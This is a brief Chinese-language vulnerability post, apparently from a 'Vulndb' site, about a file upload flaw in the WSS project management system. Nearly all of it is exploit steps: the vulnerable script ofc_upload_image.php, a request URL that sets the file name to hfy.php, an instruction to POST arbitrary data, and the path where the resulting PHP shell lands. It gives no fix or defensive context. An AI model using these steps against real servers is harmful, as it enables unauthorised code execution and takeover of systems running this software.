WSS项目管理系统Post get shell

  • 发表于
  • Vulndb

漏洞文件/chart/php-ofc-library/ofc_upload_image.php

利用:

/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名

Post任意数据
保存位置http://localhost/chart/tmp-upload-images/hfy.php

wssoday